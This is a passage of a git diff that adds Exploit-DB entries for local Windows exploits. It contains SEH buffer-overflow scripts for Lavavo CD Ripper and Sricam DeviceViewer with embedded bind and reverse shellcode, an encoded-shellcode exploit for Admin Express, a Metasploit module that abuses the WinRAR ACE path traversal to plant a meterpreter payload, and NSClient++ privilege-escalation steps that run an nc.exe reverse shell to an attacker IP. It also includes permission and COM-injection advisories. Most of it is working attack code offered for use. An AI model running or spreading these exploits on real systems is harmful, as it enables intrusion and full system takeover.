+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/46742.txt b/exploits/windows/local/46742.txt
new file mode 100644
index 000000000..93b7fa17d
--- /dev/null
+++ b/exploits/windows/local/46742.txt
@@ -0,0 +1,43 @@
+Ross Video DashBoard 8.5.1 Insecure Permissions
+
+
+Vendor: Ross Video Ltd.
+Product web page: https://www.rossvideo.com
+Affected version: 8.5.1
+
+Summary: DashBoard is a free and open platform from Ross Video for facility
+control and monitoring that enables users to quickly build unique, tailored
+Custom Panels that make complex operations simple.
+
+Desc: DashBoard suffers from an elevation of privileges vulnerability which
+can be used by a simple authenticated user that can change the executable file
+with a binary of choice. The vulnerability exist due to the improper permissions,
+with the 'M' flag (Modify) or 'C' flag (Change) for 'Authenticated Users' group.
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5516
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5516.php
+
+
+23.04.2019
+
+--
+
+
+C:\DashBoard>icacls DashBoard.exe && cacls DashBoard.exe
+DashBoard.exe BUILTIN\Administrators:(I)(F)
+              NT AUTHORITY\SYSTEM:(I)(F)
+              BUILTIN\Users:(I)(RX)
+              NT AUTHORITY\Authenticated Users:(I)(M)
+
+Successfully processed 1 files; Failed processing 0 files
+C:\DashBoard\DashBoard.exe BUILTIN\Administrators:(ID)F
+                           NT AUTHORITY\SYSTEM:(ID)F
+                           BUILTIN\Users:(ID)R
+                           NT AUTHORITY\Authenticated Users:(ID)C
\ No newline at end of file
diff --git a/exploits/windows/local/46747.txt b/exploits/windows/local/46747.txt
new file mode 100644
index 000000000..a37f7e20e
--- /dev/null
+++ b/exploits/windows/local/46747.txt
@@ -0,0 +1,35 @@
+VirtualBox: COM RPC Interface Code Injection Host EoP
+Platform: VirtualBox 6.0.4 r128413 x64 on Windows 10 1809
+Class: Elevation of Privilege
+
+Summary: 
+
+The hardened VirtualBox process on a Windows host doesn’t secure its COM interface leading to arbitrary code injection and EoP.
+
+Description:
+
+This issue is similar in scope to others I’ve reported such as S0867394/CVE-2017-10204. It allows you to call arbitrary code inside the hardened process which can expose the kernel drivers to normal user processes resulting in EoP. I’m assuming that this is still an issue you’d like to fix?
+
+The VirtualBox hardening code allows other processes running as the same user to read all virtual memory by granting the PROCESS_VM_READ access right. It isn’t obvious that this could result in arbitrary code execution, except that VirtualBox initializes out-of-process COM and by extension exposes an RPC interface. With access to read arbitrary memory from such a process it’s possible to call existing interfaces running inside the VirtualBox process such as the undocumented IRundown interface which COM uses for various infrastructure tasks. This interface has a DoCallback method which will execute an arbitrary function in the process with a single arbitrary pointer sized argument.
+
+You can get more details from my blog about using this technique as a mechanism to bypass Windows Protected Processes, https://googleprojectzero.blogspot.com/2018/11/injecting-code-into-windows-protected.html. In this case we don’t need to abuse an old version of WERFault to dump memory as the hardening driver allows us to do just read memory.
+
+To fix this issue you might want to block PROCESS_VM_READ access entirely, it’s not clear if this is a necessary access right for something or just because it didn’t seem to be dangerous. I’d also call CoInitializeSecurity at process start and pass an security descriptor to the pSecDesc parameter which limits access to administrators and perhaps service accounts. However be careful if you decide to only initialize CoInitializeSecurity as it’s process wide and has weird behaviors which might result in the security descriptor getting unset. I’d probably call the API every time you call CoInitialize just in case.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will use the vulnerability to call ExitProcess with the exit code ‘12345678’ inside a VirtualBox process. Note that by default it’s designed to work out of the box on Windows 10 1809 x64 updated to March 2019. It will fallback to trying to lookup symbol addresses using the DBGHELP library if the combase DLL doesn’t match, however you’ll need to have cached the symbols for combase inside C:\ProgramData\dbg\sym. You can do this by running the ‘symchk’ tool from a Debugging Tools for Windows installation and passing the path to the x64 version of combase.
+
+1) Compile the C# project using Visual Studio 2017. It’ll need to pull NtApiDotNet from NuGet to build.
+2) Start a virtual machine and note the PID of the hardened VirtualBox process.
+3) As a normal user run the PoC passing the PID of the hardened VirtualBox process.
+
+Expected Result:
+The PoC fails to call code inside the target process.
+
+Observed Result:
+The PoC executes ExitProcess inside the hardened process and verifies the return code once the process exits.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46747.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46755.py b/exploits/windows/local/46755.py
new file mode 100755
index 000000000..c9d2a1ca8
--- /dev/null
+++ b/exploits/windows/local/46755.py
@@ -0,0 +1,65 @@
+# Exploit Title: Lavavo CD Ripper 4.20 Local Seh Exploit
+# Date: 25.04.2019
+# Vendor Homepage:https://www.lavavosoftware.com
+# Software Link:  https://lavavo-cd-ripper.jaleco.com/download
+# Exploit Author: Achilles
+# Tested Version: 4.20
+# Tested on: Windows XP SP3 EN
+#            Windows 7 Sp1 x64
+
+# 1.- Run python code : Lavavo.py
+# 2.- Open EVIL.txt and copy content to Clipboard
+# 3.- Open LavavoCDRipper.exe and click UNLOCK.
+# 4.- Paste the Content of EVIL.txt into the 'License Activation Name'
+# 5.- License Key 123456789
+# 6.- Click 'Unlock Now' and you will have a bind shell port 3110.
+
+#!/usr/bin/env python
+import struct
+
+buffer = "\x41" * 300
+nseh = "\xeb\x06\x90\x90" #jmp short 6
+seh  =  struct.pack('<L',0x1003157d) #libsndfile.dll
+nops =  "\x90" * 20
+
+#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
+#badchars "\x00\x0a\x0d"
+shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b" 
+"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
+"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
+"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
+"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
+"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
+"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
+"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
+"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
+"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
+"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
+"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
+"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
+"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
+"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
+"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
+"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
+"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
+"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
+"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
+"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
+"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
+"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
+"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
+"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
+"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
+"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
+"\x77\x03\x31\x3a")
+pad ="C" * (6000 - len(buffer) - len(nseh+seh) - len(nops) -len(shellcode))
+payload = buffer + nseh + seh + nops + shellcode + pad
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(payload)
+	f.write(payload)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/46756.rb b/exploits/windows/local/46756.rb
new file mode 100755
index 000000000..b6e35f93c
--- /dev/null
+++ b/exploits/windows/local/46756.rb
@@ -0,0 +1,221 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+#
+# TODO: add other non-payload files
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'RARLAB WinRAR ACE Format Input Validation Remote Code Execution',
+      'Description'    => %q{
+        In WinRAR versions prior to and including 5.61, there is path traversal vulnerability
+        when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename
+        field is manipulated with specific patterns, the destination (extraction) folder is
+        ignored, thus treating the filename as an absolute path. This module will attempt to
+        extract a payload to the startup folder of the current user. It is limited such that
+        we can only go back one folder. Therefore, for this exploit to work properly, the user
+        must extract the supplied RAR file from one folder within the user profile folder
+        (e.g. Desktop or Downloads). User restart is required to gain a shell.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Nadav Grossman', # exploit discovery
+          'Imran E. Dawoodjee <imrandawoodjee.infosec@gmail.com>' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2018-20250'],
+          ['EDB', '46552'],
+          ['BID', '106948'],
+          ['URL', 'https://research.checkpoint.com/extracting-code-execution-from-winrar/'],
+          ['URL', 'https://apidoc.roe.ch/acefile/latest/'],
+          ['URL', 'http://www.hugi.scene.org/online/coding/hugi%2012%20-%20coace.htm'],
+        ],
+      'Platform'       => 'win',
+      'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
+      'Targets'        =>
+        [
+          [ 'RARLAB WinRAR <= 5.61', {} ]
+        ],
+      'DisclosureDate' => 'Feb 05 2019',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ true, 'The output file name.', 'msf.ace']),
+        OptString.new('CUSTFILE', [ false, 'User-defined custom payload', '']),
+        OptString.new('FILE_LIST', [false, 'List of other non-payload files to add', ''])
+      ])
+
+  end
+
+  def exploit
+    ace_header = ""
+    # All hex values are already in little endian.
+    # HEAD_CRC: Lower 2 bytes of CRC32 of 49 bytes of header after HEAD_TYPE.
+    # The bogus value for HEAD_CRC will be replaced later.
+    ace_header << "AA"
+    # HEAD_SIZE: header size. \x31\x00 says 49.
+    ace_header << "\x31\x00"
+    # HEAD_TYPE: header type. Archive header is 0.
+    ace_header << "\x00"
+    # HEAD_FLAGS: header flags
+    ace_header << "\x00\x90"
+    # ACE magic
+    ace_header << "\x2A\x2A\x41\x43\x45\x2A\x2A"
+    # VER_EXTRACT: version needed to extract archive
+    ace_header << "\x14"
+    # VER_CREATED: version used to create archive
+    ace_header << "\x14"
+    # HOST_CREATED: host OS for ACE used to create archive
+    ace_header << "\x02"
+    # VOLUME_NUM: which volume of a multi-volume archive?
+    ace_header << "\x00"
+    # TIME_CREATED: date and time in MS-DOS format
+    ace_header << "\x10\x18\x56\x4E"
+    # RESERVED1
+    ace_header << "\x97\x4F\xF6\xAA\x00\x00\x00\x00"
+    # AV_SIZE: advert size
+    ace_header << "\x16"
+    # AV: advert which shows if registered/unregistered.
+    # Full advert says "*UNREGISTERED VERSION*"
+    ace_header << "\x2A\x55\x4E\x52\x45\x47\x49\x53\x54\x45\x52\x45\x44\x20\x56\x45\x52\x53\x49\x4F\x4E\x2A"
+
+    # calculate the CRC32 of ACE header, and get the lower 2 bytes
+    ace_header_crc32 = crc32(ace_header[4, ace_header.length]).to_s(16)
+    ace_header_crc16 = ace_header_crc32.last(4).to_i(base=16)
+    ace_header[0,2] = [ace_header_crc16].pack("v")
+
+    # start putting the ACE file together
+    ace_file = ""
+    ace_file << ace_header
+
+    # create headers and append file data after header
+    unless datastore["FILE_LIST"].empty?
+      print_status("Using the provided list of files @ #{datastore["FILE_LIST"]}...")
+      File.binread(datastore["FILE_LIST"]).each_line do |file|
+        file = file.chomp
+        file_header_and_data = create_file_header_and_data(file, false, false)
+        ace_file << file_header_and_data
+      end
+    end
+
+    # autogenerated payload
+    if datastore["CUSTFILE"].empty?
+      payload_filename = ""
+      # 72 characters
+      payload_filename << "C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
+      # 6 characters
+      payload_filename << rand_text_alpha(6)
+      # 4 characters
+      payload_filename << ".exe"
+      payload_file_header = create_file_header_and_data(payload_filename, true, false)
+    # user-defined payload
+    else
+      print_status("Using a custom payload: #{::File.basename(datastore["CUSTFILE"])}")
+      payload_filename = ""
+      # 72 characters
+      payload_filename << "C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
+      # n characters
+      payload_filename << ::File.basename(datastore["CUSTFILE"])
+      payload_file_header = create_file_header_and_data(payload_filename, true, true)
+    end
+
+    vprint_status("Payload filename: #{payload_filename.from(72)}")
+
+    # append payload file header and the payload itself into the rest of the data
+    ace_file << payload_file_header
+    # create the file
+    file_create(ace_file)
+  end
+
+  # The CRC implementation used in ACE does not take the last step in calculating CRC32.
+  # That is, it does not flip the bits. Therefore, it can be easily calculated by taking
+  # the negative bitwise OR of the usual CRC and then subtracting one from it. This is due to
+  # the way the bitwise OR works in Ruby: unsigned integers are not a thing in Ruby, so
+  # applying a bitwise OR on an integer will produce its negative + 1.
+  def crc32(data)
+    table = Zlib.crc_table
+    crc = 0xffffffff
+    data.unpack('C*').each { |b|
+      crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
+    }
+    -(~crc) - 1
+  end
+
+  # create file headers for each file to put into the output ACE file
+  def create_file_header_and_data(path, is_payload, is_custom_payload)
+    #print_status("Length of #{path}: #{path.length}")
+    if is_payload and is_custom_payload
+      file_data = File.binread(path.from(72))
+    elsif is_payload and !is_custom_payload
+      file_data = generate_payload_exe
+    else
+      file_data = File.binread(File.basename(path))
+    end
+
+    file_data_crc32 = crc32(file_data).to_i
+
+    # HEAD_CRC: Lower 2 bytes of CRC32 of the next bytes of header after HEAD_TYPE.
+    # The bogus value for HEAD_CRC will be replaced later.
+    file_header = ""
+    file_header << "AA"
+    # HEAD_SIZE: file header size.
+    if is_payload
+      file_header << [31 + path.length].pack("v")
+    else
+      file_header << [31 + ::File.basename(path).length].pack("v")
+    end
+    # HEAD_TYPE: header type is 1.
+    file_header << "\x01"
+    # HEAD_FLAGS: header flags. \x01\x80 is ADDSIZE|SOLID.
+    file_header << "\x01\x80"
+    # PACK_SIZE: size when packed.
+    file_header << [file_data.length].pack("V")
+    #print_status("#{file_data.length}")
+    # ORIG_SIZE: original size. Same as PACK_SIZE since no compression is *truly* taking place.
+    file_header << [file_data.length].pack("V")
+    # FTIME: file date and time in MS-DOS format
+    file_header << "\x63\xB0\x55\x4E"
+    # ATTR: DOS/Windows file attribute bit field, as int, as produced by the Windows GetFileAttributes() API.
+    file_header << "\x20\x00\x00\x00"
+    # CRC32: CRC32 of the compressed file
+    file_header << [file_data_crc32].pack("V")
+    # Compression type
+    file_header << "\x00"
+    # Compression quality
+    file_header << "\x03"
+    # Parameter for decompression
+    file_header << "\x0A\x00"
+    # RESERVED1
+    file_header << "\x54\x45"
+    # FNAME_SIZE: size of filename string
+    if is_payload
+      file_header << [path.length].pack("v")
+    else
+      # print_status("#{::File.basename(path).length}")
+      file_header << [::File.basename(path).length].pack("v")
+    end
+    #file_header << [path.length].pack("v")
+    # FNAME: filename string. Empty for now. Fill in later.
+    if is_payload
+      file_header << path
+    else
+      file_header << ::File.basename(path)
+    end
+
+    #print_status("Calculating other_file_header...")
+    file_header_crc32 = crc32(file_header[4, file_header.length]).to_s(16)
+    file_header_crc16 = file_header_crc32.last(4).to_i(base=16)
+    file_header[0,2] = [file_header_crc16].pack("v")
+    file_header << file_data
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/local/46779.py b/exploits/windows/local/46779.py
new file mode 100755
index 000000000..f142216e9
--- /dev/null
+++ b/exploits/windows/local/46779.py
@@ -0,0 +1,76 @@
+# Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow (PoC)
+# Discovery Date: 25/04/2019
+# Exploit Author: Hayden Wright
+# Vendor Homepage: www.sricam.com/
+# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
+# Version: v3.12.0.1
+# Tested on: Windows XP Pro x64, Windows 7 32bit
+# CVE : CVE-2019-11563
+
+#!/usr/bin/python
+import struct
+
+#------------------------------------------------------------#
+# CVE-2019-11563                                             #
+#                                                            #
+# Sricam DeviceViewer.exe 'username' field SEH overflow      #
+# by Hayden Wright                                           #
+#                                                            #
+# (*) badchars = '\x00\x0a\x0d'                              #
+# (*) SEH = 0x6a413969 OFFSET 268                            #
+# (*) nSEH = 268 -4                                          #
+#                                                            #
+#  69901d06  5E  POP ESI                                     #
+#  69901d07  5F  POP EDI                                     #
+#  69901d08  C3  RETN                                        #
+#                                                            #
+#------------------------------------------------------------#
+
+#msfvenom -p windows/shell_reverse_tcp lport=1234 lhost=192.168.1.101 -f c -b '\x00\x0a\x0d' -a x86 --platform windows EXITFUNC=seh
+
+shellcode =(
+"\xb8\x51\x9c\x1c\xa4\xda\xc9\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
+"\x52\x31\x42\x12\x83\xea\xfc\x03\x13\x92\xfe\x51\x6f\x42\x7c"
+"\x99\x8f\x93\xe1\x13\x6a\xa2\x21\x47\xff\x95\x91\x03\xad\x19"
+"\x59\x41\x45\xa9\x2f\x4e\x6a\x1a\x85\xa8\x45\x9b\xb6\x89\xc4"
+"\x1f\xc5\xdd\x26\x21\x06\x10\x27\x66\x7b\xd9\x75\x3f\xf7\x4c"
+"\x69\x34\x4d\x4d\x02\x06\x43\xd5\xf7\xdf\x62\xf4\xa6\x54\x3d"
+"\xd6\x49\xb8\x35\x5f\x51\xdd\x70\x29\xea\x15\x0e\xa8\x3a\x64"
+"\xef\x07\x03\x48\x02\x59\x44\x6f\xfd\x2c\xbc\x93\x80\x36\x7b"
+"\xe9\x5e\xb2\x9f\x49\x14\x64\x7b\x6b\xf9\xf3\x08\x67\xb6\x70"
+"\x56\x64\x49\x54\xed\x90\xc2\x5b\x21\x11\x90\x7f\xe5\x79\x42"
+"\xe1\xbc\x27\x25\x1e\xde\x87\x9a\xba\x95\x2a\xce\xb6\xf4\x22"
+"\x23\xfb\x06\xb3\x2b\x8c\x75\x81\xf4\x26\x11\xa9\x7d\xe1\xe6"
+"\xce\x57\x55\x78\x31\x58\xa6\x51\xf6\x0c\xf6\xc9\xdf\x2c\x9d"
+"\x09\xdf\xf8\x32\x59\x4f\x53\xf3\x09\x2f\x03\x9b\x43\xa0\x7c"
+"\xbb\x6c\x6a\x15\x56\x97\xfd\xda\x0f\x96\x98\xb2\x4d\x98\x66"
+"\x91\xdb\x7e\x0c\x05\x8a\x29\xb9\xbc\x97\xa1\x58\x40\x02\xcc"
+"\x5b\xca\xa1\x31\x15\x3b\xcf\x21\xc2\xcb\x9a\x1b\x45\xd3\x30"
+"\x33\x09\x46\xdf\xc3\x44\x7b\x48\x94\x01\x4d\x81\x70\xbc\xf4"
+"\x3b\x66\x3d\x60\x03\x22\x9a\x51\x8a\xab\x6f\xed\xa8\xbb\xa9"
+"\xee\xf4\xef\x65\xb9\xa2\x59\xc0\x13\x05\x33\x9a\xc8\xcf\xd3"
+"\x5b\x23\xd0\xa5\x63\x6e\xa6\x49\xd5\xc7\xff\x76\xda\x8f\xf7"
+"\x0f\x06\x30\xf7\xda\x82\x4e\x09\xd6\x1e\xc6\xb0\x83\x62\x8a"
+"\x42\x7e\xa0\xb3\xc0\x8a\x59\x40\xd8\xff\x5c\x0c\x5e\xec\x2c"
+"\x1d\x0b\x12\x82\x1e\x1e")
+
+max_size = 4000
+
+buf = 'A'*264
+buf += '\xeb\x06\x90\x90'            #jump short 6-bytes
+buf += struct.pack('<I', 0x69901d06) #POP ESI, POP EDI, RET  avformat-54.dll
+buf += '\x90' * 16
+buf += shellcode
+buf += 'C'*(max_size - len(buf))
+
+print '[+] %s bytes buffer created...' %len(buf)
+
+try:
+    filename = 'CVE-2019-11563.txt'
+    file = open(filename , 'w')
+    file.write(buf)
+    print '[+] Evil buffer saved to file: ' + filename
+    print '[+] Copy + paste its contents into the "user" field and hit login'
+    file.close()
+except:
+    print "[!] Could not create file!"
\ No newline at end of file
diff --git a/exploits/windows/local/46802.txt b/exploits/windows/local/46802.txt
new file mode 100644
index 000000000..ed4f283d8
--- /dev/null
+++ b/exploits/windows/local/46802.txt
@@ -0,0 +1,63 @@
+Exploit Author: bzyo
+Twitter: @bzyo_
+Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
+Date: 05-05-19
+Vulnerable Software: NSClient++ 0.5.2.35
+Vendor Homepage: http://nsclient.org/
+Version: 0.5.2.35
+Software Link: http://nsclient.org/download/
+Tested on: Windows 10 x64
+
+Details:
+When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file.  From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.  
+
+The user is able to enable the modules to check external scripts and schedule those scripts to run.  There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere.  Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation.  A reboot, as far as I can tell, is required to reload and read the changes to the web config.  
+
+Prerequisites:
+To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.
+
+Exploit:
+1. Grab web administrator password
+- open c:\program files\nsclient++\nsclient.ini
+or
+- run the following that is instructed when you select forget password
+	C:\Program Files\NSClient++>nscp web -- password --display
+	Current password: SoSecret
+
+2. Login and enable following modules including enable at startup and save configuration
+- CheckExternalScripts
+- Scheduler
+
+3. Download nc.exe and evil.bat to c:\temp from attacking machine
+	@echo off
+	c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe
+
+4. Setup listener on attacking machine
+	nc -nlvvp 443
+
+5. Add script foobar to call evil.bat and save settings
+- Settings > External Scripts > Scripts
+- Add New
+	- foobar
+		command = c:\temp\evil.bat
+
+6. Add schedulede to call script every 1 minute and save settings
+- Settings > Scheduler > Schedules
+- Add new
+	- foobar
+		interval = 1m
+		command = foobar
+
+7. Restart the computer and wait for the reverse shell on attacking machine
+	nc -nlvvp 443
+	listening on [any] 443 ...
+	connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
+	Microsoft Windows [Version 10.0.17134.753]
+	(c) 2018 Microsoft Corporation. All rights reserved.
+
+	C:\Program Files\NSClient++>whoami
+	whoami
+	nt authority\system
+	
+Risk:
+The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System
\ No newline at end of file
diff --git a/exploits/windows/local/46805.py b/exploits/windows/local/46805.py
new file mode 100755
index 000000000..bbe36fa26
--- /dev/null
+++ b/exploits/windows/local/46805.py
@@ -0,0 +1,119 @@
+# Title: Admin Express v1.2.5.485 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow
+# Date: May 6th, 2019
+# Author: Connor McGarr (https://connormcgarr.github.io)
+# Vendor Homepage: https://admin-express.en.softonic.com/
+# Software Link: https://admin-express.en.softonic.com/download
+# Version v1.2.5.485
+# Tested on: Windows XP SP3 EN
+
+# TO RUN:
+# 1. Run python script
+# 2. Copy contents of pwn.txt
+# 3. Open Admin Express
+# 4. Select System Compare
+# 5. Paste contents into the left-hand side Folder Path field
+# 6. Click the scale icon in the middle of the screen, under the Services and Running Processes tabs
+
+
+# This got a bit hairy. We manually encoded our shellcode and had to use the sub method for encoding each line of payload.
+# 05 was a bad character for us, which is an add eax opcode. We could use (in hex) 1-4,6,10-7E. This was an odd character set.
+
+# Can replace with a shell, if you are willing to do the encoding and decoding math Too preoccupied for now, so here is calc.exe
+# You would need to use logical AND plus the sub eax opcodes to get a value on the stack that could jump back to the A buffer, where there is
+# much more room. Then you would need to align the stack with the stack pointer value you need (not 0x012F3F4 as used below) and write to the stack upwards.
+# You should have enough room for all of the logical AND plus sub eax commands to get a full-sized shell payload on the stack.
+
+# calc.exe shellcode:
+# "\x31\xc9\x51\x68"
+# "\x63\x61\x6c\x63"
+# "\x54\xB8\xc7\x93"
+# "\xc2\x77\xff\xd0"
+
+# For zeroing out registers before manual shellcode
+zero = "\x25\x01\x01\x01\x01"           # and eax, 0x01010101
+zero += "\x25\x10\x10\x10\x10"          # and eax, 0x10101010
+
+# We need to save the current stack pointer before execution of shellcode, due to
+# old stack pointer value needed when executing our payload of calc.exe. This puts the current stack pointer 0x0012DC98 into ECX, to be used later
+restore = "\x54" # push esp; (pushing the current value of ESP, which needs to be restored later, onto the stack)
+restore += "\x59" # pop ecx; (holding the value of old ESP in ECX, to be called later.)
+restore += "\x51" # push ecx; (to get the value on the stack for the mov esp command later)
+
+# Stack alignment
+# Need to make ESP 0x012F3F4. Using sub method to write that value onto the stack.
+# After making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack.
+alignment = "\x54" # push esp
+alignment += "\x58" # pop eax; (puts the value of ESP into EAX)
+
+# Write these 3 sub values in normal format, since memory address, not instruction to be executed. You do not have to do
+# it this way, but I do my calculations in normal format to remind me it is a memory address, when doing hex max. For my
+# other operations, I used little endian. If you do all of the calculations in one way, you do not need to flip the sub 
+# math difference results. This is how I keep things straight
+# 384D5555 364D5555 364E5555
+alignment += "\x2d\x38\x4d\x55\x55" # sub eax, 0x384D5555
+alignment += "\x2d\x36\x4d\x55\x55" # sub eax, 0x364D5555
+alignment += "\x2d\x36\x4e\x55\x55" # sub eax, 0x364E5555
+alignment += "\x50" # push eax
+alignment += "\x5c" # pop esp; (puts the value of eax back into esp)
+
+# calc.exe shellcode, via the sub method. Values needed are as followed. Reference the calc.exe shellcode line for line numbers.
+# 1st line = 2C552D14 01552D14 01562E16
+shellcode = zero
+shellcode += "\x2d\x14\x2d\x55\x2c" # sub eax, 0x2C552D14
+shellcode += "\x2d\x14\x2d\x55\x01" # sub eax, 0x01562D14
+shellcode += "\x2d\x16\x2e\x56\x01" # sub eax, 0x01562E16
+shellcode += "\x50" # push eax; (get the value on the stack). We will do this for all remaining steps like this one.
+
+# 2nd line = 24121729 24121739 2414194A
+shellcode += zero
+shellcode += "\x2d\x29\x17\x12\x24" # sub eax, 0x24121729
+shellcode += "\x2d\x39\x17\x12\x24"     # sub eax, 0x24121739
+shellcode += "\x2d\x4a\x19\x14\x24"     # sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A)
+shellcode += "\x50" # push eax
+
+# 3rd line = 34313635 34313434 34313434
+shellcode += zero
+shellcode += "\x2d\x35\x36\x31\x34" # sub eax, 0x34313635
+shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434
+shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434
+shellcode += "\x50" # push eax
+
+# 4th line = 323A1245 323A1245 333A1245
+shellcode += zero
+shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245
+shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245
+shellcode += "\x2d\x45\x12\x3a\x33" # sub eax, 0x333A1245
+shellcode += "\x50" # push eax
+
+# We need to restore the old ESP value of 0x0012DC98 to spawn calc.exe. Since it is a syscall,
+# we need the ESP value before execution. We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!).
+# Here are the 3 values: 403F2711 3F3F2711 3F3F2811
+move = zero
+move += "\x2d\x40\x3f\x27\x11" # sub eax, 0x403F2711
+move += "\x2d\x3f\x3f\x27\x11" # sub eax, 0x3F3F2711
+move += "\x2d\x3f\x3f\x28\x11" # sub eax, 0x3F3F2811
+move += "\x50" # push eax
+
+# All together now.
+payload = "\x41" * 4260
+payload += "\x70\x7e\x71\x7e" # JO 126 bytes. If jump fails, default to JNO 126 bytes
+payload += "\x42\x4c\x01\x10" # 0x10014c42 pop pop ret wmiwrap.DLL
+
+# There are 2 NULL (\x00) terminators in our buffer of A's, near our nSEH jump. We are going to jump far away from them
+# so we have enough room for our shellcode and to decode.
+payload += "\x41" * 122 # add padding since we jumped 7e hex bytes (126 bytes) above
+payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode
+payload += "\x41" * 124
+payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode
+payload += "\x41" * 124
+payload += "\x70\x79\x71\x79" # JO or JNO only 121 bytes
+payload += "\x41" * 121 # NOP is in the restricted characters. Using \x41 as a slide into alignment
+payload += restore
+payload += alignment
+payload += shellcode
+payload += move
+payload += "\x43" * (5000-len(payload))
+
+f = open('pwn.txt', 'w')
+f.write(payload)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46851.txt b/exploits/windows/local/46851.txt
new file mode 100644
index 000000000..cff530e0b
--- /dev/null
+++ b/exploits/windows/local/46851.txt
@@ -0,0 +1,34 @@
